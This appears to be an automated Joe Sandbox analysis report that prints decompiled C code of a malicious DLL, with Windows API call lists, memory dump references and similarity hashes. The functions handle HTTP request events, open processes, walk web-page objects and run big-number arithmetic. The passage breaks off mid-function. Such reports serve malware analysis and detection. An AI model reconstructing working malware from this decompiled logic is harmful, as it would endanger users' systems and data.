                                          				_t22 = __eax;
                                          				if(_a4 != 0 && E00C76B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                          					L9:
                                          					return GetLastError();
                                          				}
                                          				_t10 = E00C7A96C(_t9, _t18, _t22, _a8);
                                          				if(_t10 == 0) {
                                          					ResetEvent( *(_t22 + 0x1c));
                                          					ResetEvent( *(_t22 + 0x20));
                                          					_push(0);
                                          					_push(0);
                                          					_push(0xffffffff);
                                          					_push(0);
                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                          					if( *0xc7d12c() != 0) {
                                          						SetEvent( *(_t22 + 0x1c));
                                          						goto L7;
                                          					} else {
                                          						_t10 = GetLastError();
                                          						if(_t10 == 0x3e5) {
                                          							L7:
                                          							_t10 = 0;
                                          						}
                                          					}
                                          				}
                                          				if(_t10 == 0xffffffff) {
                                          					goto L9;
                                          				}
                                          				return _t10;
                                          			}








                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,00C766AF,?,?,00000000,00000000), ref: 00C7A021
                                          • ResetEvent.KERNEL32(?), ref: 00C7A026
                                          • GetLastError.KERNEL32 ref: 00C7A03E
                                          • GetLastError.KERNEL32(?,?,00000102,00C766AF,?,?,00000000,00000000), ref: 00C7A059
                                            • Part of subcall function 00C76B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,00C7A006,?,?,?,?,00000102,00C766AF,?,?,00000000), ref: 00C76B7A
                                            • Part of subcall function 00C76B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00C7A006,?,?,?,?,00000102,00C766AF,?), ref: 00C76BD8
                                            • Part of subcall function 00C76B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 00C76BE8
                                          • SetEvent.KERNEL32(?), ref: 00C7A04C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: 2350aa7930769e9891c07f64a2cd7e6f992d3b1f4c9367501a6cd05966cb0f42
                                          • Instruction ID: 52ad23ee07d6e09075dec92a1f6da907ce510211bf6b949be8dd59dc22a903a8
                                          • Opcode Fuzzy Hash: 2350aa7930769e9891c07f64a2cd7e6f992d3b1f4c9367501a6cd05966cb0f42
                                          • Instruction Fuzzy Hash: 92014B31100201ABDB306B71DC44F5FB6A9EF85764F208A28F66AD10E0D721E855EA62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00C76A7F(intOrPtr _a4) {
                                          				void* _t2;
                                          				unsigned int _t4;
                                          				void* _t5;
                                          				long _t6;
                                          				void* _t7;
                                          				void* _t15;
                                          
                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                          				 *0xc7d26c = _t2;
                                          				if(_t2 == 0) {
                                          					return GetLastError();
                                          				}
                                          				_t4 = GetVersion();
                                          				if(_t4 != 5) {
                                          					L4:
                                          					if(_t15 <= 0) {
                                          						_t5 = 0x32;
                                          						return _t5;
                                          					}
                                          					L5:
                                          					 *0xc7d25c = _t4;
                                          					_t6 = GetCurrentProcessId();
                                          					 *0xc7d258 = _t6;
                                          					 *0xc7d264 = _a4;
                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                          					 *0xc7d254 = _t7;
                                          					if(_t7 == 0) {
                                          						 *0xc7d254 =  *0xc7d254 | 0xffffffff;
                                          					}
                                          					return 0;
                                          				}
                                          				if(_t4 >> 8 > 0) {
                                          					goto L5;
                                          				}
                                          				_t15 = _t4 - _t4;
                                          				goto L4;
                                          			}










                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00C790D2,?), ref: 00C76A87
                                          • GetVersion.KERNEL32 ref: 00C76A96
                                          • GetCurrentProcessId.KERNEL32 ref: 00C76AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00C76ACF
                                          • GetLastError.KERNEL32 ref: 00C76AEE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: ed9d57f41e7155180745658c9350605befdadb1804d3270a41044b01c438dbda
                                          • Instruction ID: c86995bc508543e65f4eb8787ccb9d460d3dd2c5a3a2cb282b4c3ed7894714c5
                                          • Opcode Fuzzy Hash: ed9d57f41e7155180745658c9350605befdadb1804d3270a41044b01c438dbda
                                          • Instruction Fuzzy Hash: E9F08C70650702DBDB209F65AC4AB1D3B70AB44721F20C01AE55FE61E1D770C986DB25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E00C791B5(intOrPtr* __eax) {
                                          				void* _v8;
                                          				WCHAR* _v12;
                                          				void* _v16;
                                          				char _v20;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				void* _v32;
                                          				intOrPtr _v40;
                                          				short _v48;
                                          				intOrPtr _v56;
                                          				short _v64;
                                          				intOrPtr* _t54;
                                          				intOrPtr* _t56;
                                          				intOrPtr _t57;
                                          				intOrPtr* _t58;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          				intOrPtr* _t63;
                                          				intOrPtr* _t65;
                                          				short _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t70;
                                          				intOrPtr* _t72;
                                          				intOrPtr* _t75;
                                          				intOrPtr* _t77;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t87;
                                          				intOrPtr _t103;
                                          				intOrPtr _t109;
                                          				void* _t118;
                                          				void* _t122;
                                          				void* _t123;
                                          				intOrPtr _t130;
                                          
                                          				_t123 = _t122 - 0x3c;
                                          				_push( &_v8);
                                          				_push(__eax);
                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                          				if(_t118 >= 0) {
                                          					_t54 = _v8;
                                          					_t103 =  *0xc7d2a4; // 0x24ba5a8
                                          					_t5 = _t103 + 0xc7e038; // 0x3050f485
                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                          					_t56 = _v8;
                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                          					if(_t118 >= 0) {
                                          						__imp__#2(0xc7c298);
                                          						_v28 = _t57;
                                          						if(_t57 == 0) {
                                          							_t118 = 0x8007000e;
                                          						} else {
                                          							_t60 = _v32;
                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                          							_t87 = __imp__#6;
                                          							_t118 = _t61;
                                          							if(_t118 >= 0) {
                                          								_t63 = _v24;
                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                          								if(_t118 >= 0) {
                                          									_t130 = _v20;
                                          									if(_t130 != 0) {
                                          										_t67 = 3;
                                          										_v64 = _t67;
                                          										_v48 = _t67;
                                          										_v56 = 0;
                                          										_v40 = 0;
                                          										if(_t130 > 0) {
                                          											while(1) {
                                          												_t68 = _v24;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t123 = _t123;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                          												if(_t118 < 0) {
                                          													goto L16;
                                          												}
                                          												_t70 = _v8;
                                          												_t109 =  *0xc7d2a4; // 0x24ba5a8
                                          												_t28 = _t109 + 0xc7e0bc; // 0x3050f1ff
                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                          												if(_t118 >= 0) {
                                          													_t75 = _v16;
                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                          													if(_t118 >= 0 && _v12 != 0) {
                                          														_t79 =  *0xc7d2a4; // 0x24ba5a8
                                          														_t33 = _t79 + 0xc7e078; // 0x76006f
                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                          															_t83 = _v16;
                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                          														}
                                          														 *_t87(_v12);
                                          													}
                                          													_t77 = _v16;
                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                          												}
                                          												_t72 = _v8;
                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                          												_v40 = _v40 + 1;
                                          												if(_v40 < _v20) {
                                          													continue;
                                          												}
                                          												goto L16;
                                          											}
                                          										}
                                          									}
                                          								}
                                          								L16:
                                          								_t65 = _v24;
                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                          							}
                                          							 *_t87(_v28);
                                          						}
                                          						_t58 = _v32;
                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                          					}
                                          				}
                                          				return _t118;
                                          			}






































                                          APIs
                                          • SysAllocString.OLEAUT32(00C7C298), ref: 00C79205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00C792E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C792FF
                                          • SysFreeString.OLEAUT32(?), ref: 00C7932E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: 28f889343d649eff764fc95c0f4460e7af52fd6b0cb2609190a8892097ff3d99
                                          • Instruction ID: caa5b1bf1874861e56635da23f856f871c82f07cf5ce58613b7f7e6e893bc419
                                          • Opcode Fuzzy Hash: 28f889343d649eff764fc95c0f4460e7af52fd6b0cb2609190a8892097ff3d99
                                          • Instruction Fuzzy Hash: DB512375D00519EFCB04DFE8C888DAEB7B9FF89704B148598E919EB261D7319D42CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E00C77664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				void _v92;
                                          				void _v236;
                                          				void* _t55;
                                          				unsigned int _t56;
                                          				signed int _t66;
                                          				signed int _t74;
                                          				void* _t76;
                                          				signed int _t79;
                                          				void* _t81;
                                          				void* _t92;
                                          				void* _t96;
                                          				signed int* _t99;
                                          				signed int _t101;
                                          				signed int _t103;
                                          				void* _t107;
                                          
                                          				_t92 = _a12;
                                          				_t101 = __eax;
                                          				_t55 = E00C748F0(_a16, _t92);
                                          				_t79 = _t55;
                                          				if(_t79 == 0) {
                                          					L18:
                                          					return _t55;
                                          				}
                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                          				_t81 = 0;
                                          				_t96 = 0x20;
                                          				if(_t56 == 0) {
                                          					L4:
                                          					_t97 = _t96 - _t81;
                                          					_v12 = _t96 - _t81;
                                          					E00C7748A(_t79,  &_v236);
                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00C77074(_t101,  &_v236, _a8, _t96 - _t81);
                                          					E00C77074(_t79,  &_v92, _a12, _t97);
                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                          					_t66 = E00C7748A(_t101, 0xc7d1b0);
                                          					_t103 = _t101 - _t79;
                                          					_a8 = _t103;
                                          					if(_t103 < 0) {
                                          						L17:
                                          						E00C7748A(_a16, _a4);
                                          						E00C72FED(_t79,  &_v236, _a4, _t97);
                                          						memset( &_v236, 0, 0x8c);
                                          						_t55 = memset( &_v92, 0, 0x44);
                                          						goto L18;
                                          					}
                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                          					do {
                                          						if(_v8 != 0xffffffff) {
                                          							_push(1);
                                          							_push(0);
                                          							_push(0);
                                          							_push( *_t99);
                                          							L00C7B088();
                                          							_t74 = _t66 +  *(_t99 - 4);
                                          							asm("adc edx, esi");
                                          							_push(0);
                                          							_push(_v8 + 1);
                                          							_push(_t92);
                                          							_push(_t74);
                                          							L00C7B082();
                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                          								_t74 = _t74 | 0xffffffff;
                                          								_v16 = _v16 & 0x00000000;
                                          							}
                                          						} else {
                                          							_t74 =  *_t99;
                                          						}
                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                          						_a12 = _t74;
                                          						_t76 = E00C76FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                          						while(1) {
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							L13:
                                          							_t92 =  &_v92;
                                          							if(E00C715CE(_t79, _t92, _t106) < 0) {
                                          								break;
                                          							}
                                          							L14:
                                          							_a12 = _a12 + 1;
                                          							_t76 = E00C7687D(_t79,  &_v92, _t106, _t106);
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							goto L13;
                                          						}
                                          						_a8 = _a8 - 1;
                                          						_t66 = _a12;
                                          						_t99 = _t99 - 4;
                                          						 *(0xc7d1b0 + _a8 * 4) = _t66;
                                          					} while (_a8 >= 0);
                                          					_t97 = _v12;
                                          					goto L17;
                                          				}
                                          				while(_t81 < _t96) {
                                          					_t81 = _t81 + 1;
                                          					_t56 = _t56 >> 1;
                                          					if(_t56 != 0) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				goto L4;
                                          			}






















                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00C77711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00C77727
                                          • memset.NTDLL ref: 00C777C7
                                          • memset.NTDLL ref: 00C777D7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: d1ab38fc80ab3d554ca1d6ff41c42e3eafdb8166302197929f27d99fe6547f97
                                          • Instruction ID: 7cfaa5d0662178e373274d8f892f8a5f84bc4af0db280a2d0030f8114fbc9106
                                          • Opcode Fuzzy Hash: d1ab38fc80ab3d554ca1d6ff41c42e3eafdb8166302197929f27d99fe6547f97
                                          • Instruction Fuzzy Hash: 2641A431A0025DABDB15DFA8CC41BDE7B74EF44310F10C629F91EA7181DB709E549B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 00C7A97E
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • ResetEvent.KERNEL32(?), ref: 00C7A9F2
                                          • GetLastError.KERNEL32 ref: 00C7AA15
                                          • GetLastError.KERNEL32 ref: 00C7AAC0
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: d307ee94d898094f3f1c6e0dbca644bf0e6c30bdda202f1ac42cdfc1e8055f55
                                          • Instruction ID: 2dbe0d4bd7a7aa4fa989153b2343aabe452a3d92d6ea8a2aca938779b67f7ad3
                                          • Opcode Fuzzy Hash: d307ee94d898094f3f1c6e0dbca644bf0e6c30bdda202f1ac42cdfc1e8055f55
                                          • Instruction Fuzzy Hash: E4415B71500604BBD7219FA5CD88F9F7BBDEF88B10F148929B55BA10A0E731AA44DB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E00C78F08(void* __eax) {
                                          				char _v8;
                                          				void* _v12;
                                          				intOrPtr _v16;
                                          				char _v20;
                                          				void* __esi;
                                          				intOrPtr _t36;
                                          				intOrPtr* _t37;
                                          				intOrPtr* _t39;
                                          				void* _t53;
                                          				long _t58;
                                          				void* _t59;
                                          
                                          				_t59 = __eax;
                                          				_t58 = 0;
                                          				ResetEvent( *(__eax + 0x1c));
                                          				_push( &_v8);
                                          				_push(4);
                                          				_push( &_v20);
                                          				_push( *((intOrPtr*)(_t59 + 0x18)));
                                          				if( *0xc7d138() != 0) {
                                          					L5:
                                          					if(_v8 == 0) {
                                          						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                          						L21:
                                          						return _t58;
                                          					}
                                          					 *0xc7d168(0, 1,  &_v12);
                                          					if(0 != 0) {
                                          						_t58 = 8;
                                          						goto L21;
                                          					}
                                          					_t36 = E00C758BE(0x1000);
                                          					_v16 = _t36;
                                          					if(_t36 == 0) {
                                          						_t58 = 8;
                                          						L18:
                                          						_t37 = _v12;
                                          						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                          						goto L21;
                                          					}
                                          					_push(0);
                                          					_push(_v8);
                                          					_push( &_v20);
                                          					while(1) {
                                          						_t39 = _v12;
                                          						_t56 =  *_t39;
                                          						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                          						ResetEvent( *(_t59 + 0x1c));
                                          						_push( &_v8);
                                          						_push(0x1000);
                                          						_push(_v16);
                                          						_push( *((intOrPtr*)(_t59 + 0x18)));
                                          						if( *0xc7d138() != 0) {
                                          							goto L13;
                                          						}
                                          						_t58 = GetLastError();
                                          						if(_t58 != 0x3e5) {
                                          							L15:
                                          							E00C7147E(_v16);
                                          							if(_t58 == 0) {
                                          								_t58 = E00C716DB(_v12, _t59);
                                          							}
                                          							goto L18;
                                          						}
                                          						_t58 = E00C79D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						L13:
                                          						_t58 = 0;
                                          						if(_v8 == 0) {
                                          							goto L15;
                                          						}
                                          						_push(0);
                                          						_push(_v8);
                                          						_push(_v16);
                                          					}
                                          				}
                                          				_t58 = GetLastError();
                                          				if(_t58 != 0x3e5) {
                                          					L4:
                                          					if(_t58 != 0) {
                                          						goto L21;
                                          					}
                                          					goto L5;
                                          				}
                                          				_t58 = E00C79D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
                                          				if(_t58 != 0) {
                                          					goto L21;
                                          				}
                                          				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          				goto L4;
                                          			}















                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 00C78F1E
                                          • GetLastError.KERNEL32 ref: 00C78F37
                                            • Part of subcall function 00C79D3A: WaitForMultipleObjects.KERNEL32(00000002,00C7AA33,00000000,00C7AA33,?,?,?,00C7AA33,0000EA60), ref: 00C79D55
                                          • ResetEvent.KERNEL32(?), ref: 00C78FB0
                                          • GetLastError.KERNEL32 ref: 00C78FCB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: b12e7617269ada2b4833177e7d8d98d6ca57dd5c04733b66efdfe7e46087d342
                                          • Instruction ID: c92cc3951fdd265b6c0bb2d41c53d00665911317ebf9fe1e225266a099c88792
                                          • Opcode Fuzzy Hash: b12e7617269ada2b4833177e7d8d98d6ca57dd5c04733b66efdfe7e46087d342
                                          • Instruction Fuzzy Hash: 8B31B532640604AFCB21DBA9CC84F5E77B9EF88360F248528F56A97190DB70EE859B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E00C772F2(signed int _a4, signed int* _a8) {
                                          				void* __ecx;
                                          				void* __edi;
                                          				signed int _t6;
                                          				intOrPtr _t8;
                                          				intOrPtr _t12;
                                          				short* _t19;
                                          				void* _t25;
                                          				signed int* _t28;
                                          				CHAR* _t30;
                                          				long _t31;
                                          				intOrPtr* _t32;
                                          
                                          				_t6 =  *0xc7d270; // 0xd448b889
                                          				_t32 = _a4;
                                          				_a4 = _t6 ^ 0x109a6410;
                                          				_t8 =  *0xc7d2a4; // 0x24ba5a8
                                          				_t3 = _t8 + 0xc7e836; // 0x61636f4c
                                          				_t25 = 0;
                                          				_t30 = E00C76AF7(_t3, 1);
                                          				if(_t30 != 0) {
                                          					_t25 = CreateEventA(0xc7d2a8, 1, 0, _t30);
                                          					E00C7147E(_t30);
                                          				}
                                          				_t12 =  *0xc7d25c; // 0x2000000a
                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00C756A2() != 0) {
                                          					L12:
                                          					_t28 = _a8;
                                          					if(_t28 != 0) {
                                          						 *_t28 =  *_t28 | 0x00000001;
                                          					}
                                          					_t31 = E00C71493(_t32, 0);
                                          					if(_t31 == 0 && _t25 != 0) {
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          					}
                                          					if(_t28 != 0 && _t31 != 0) {
                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                          					}
                                          					goto L20;
                                          				} else {
                                          					_t19 =  *0xc7d110( *_t32, 0x20);
                                          					if(_t19 != 0) {
                                          						 *_t19 = 0;
                                          						_t19 = _t19 + 2;
                                          					}
                                          					_t31 = E00C77827(0,  *_t32, _t19, 0);
                                          					if(_t31 == 0) {
                                          						if(_t25 == 0) {
                                          							L22:
                                          							return _t31;
                                          						}
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          						if(_t31 == 0) {
                                          							L20:
                                          							if(_t25 != 0) {
                                          								CloseHandle(_t25);
                                          							}
                                          							goto L22;
                                          						}
                                          					}
                                          					goto L12;
                                          				}
                                          			}















                                          APIs
                                            • Part of subcall function 00C76AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,00C72098,74666F53,00000000,?,00C7D00C,?,?), ref: 00C76B2D
                                            • Part of subcall function 00C76AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 00C76B51
                                            • Part of subcall function 00C76AF7: lstrcat.KERNEL32(00000000,00000000), ref: 00C76B59
                                          • CreateEventA.KERNEL32(00C7D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00C7555B,?,?,?), ref: 00C77333
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,00C7555B,00000000,00000000,?,00000000,?,00C7555B,?,?,?), ref: 00C77393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00C7555B,?,?,?), ref: 00C773C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00C7555B,?,?,?), ref: 00C773D9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: b1d8d9744de9ea8b2aa67b757fd8e5ef58e3ae16435a37e401828ff291a02bbd
                                          • Instruction ID: 5c86dda19f6503ee87826ffc9950d12489af681c48e852d2a444ff8677437cfe
                                          • Opcode Fuzzy Hash: b1d8d9744de9ea8b2aa67b757fd8e5ef58e3ae16435a37e401828ff291a02bbd
                                          • Instruction Fuzzy Hash: 7821F03260424A9BC7315B6C9C85B6E77A9FF88710B068328FD3EE6165DB70CE41A690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E00C7A1F1(void* __ecx, void* __esi) {
                                          				char _v8;
                                          				long _v12;
                                          				char _v16;
                                          				long _v20;
                                          				long _t34;
                                          				long _t39;
                                          				long _t42;
                                          				long _t56;
                                          				intOrPtr _t58;
                                          				void* _t59;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          
                                          				_t61 = __esi;
                                          				_t59 = __ecx;
                                          				_t60 =  *0xc7d140; // 0xc7ad41
                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                          				do {
                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                          					_v20 = _t34;
                                          					if(_t34 != 0) {
                                          						L3:
                                          						_push( &_v16);
                                          						_push( &_v8);
                                          						_push(_t61 + 0x2c);
                                          						_push(0x20000013);
                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                          						_v8 = 4;
                                          						_v16 = 0;
                                          						if( *_t60() == 0) {
                                          							_t39 = GetLastError();
                                          							_v12 = _t39;
                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                          								L15:
                                          								return _v12;
                                          							} else {
                                          								goto L11;
                                          							}
                                          						}
                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                          							goto L11;
                                          						} else {
                                          							_v16 = 0;
                                          							_v8 = 0;
                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                          							_t58 = E00C758BE(_v8 + 1);
                                          							if(_t58 == 0) {
                                          								_v12 = 8;
                                          							} else {
                                          								_push( &_v16);
                                          								_push( &_v8);
                                          								_push(_t58);
                                          								_push(0x16);
                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                          								if( *_t60() == 0) {
                                          									E00C7147E(_t58);
                                          									_v12 = GetLastError();
                                          								} else {
                                          									 *((char*)(_t58 + _v8)) = 0;
                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                          								}
                                          							}
                                          							goto L15;
                                          						}
                                          					}
                                          					SetEvent( *(_t61 + 0x1c));
                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                          					_v12 = _t56;
                                          					if(_t56 != 0) {
                                          						goto L15;
                                          					}
                                          					goto L3;
                                          					L11:
                                          					_t42 = E00C79D3A( *(_t61 + 0x1c), _t59, 0xea60);
                                          					_v12 = _t42;
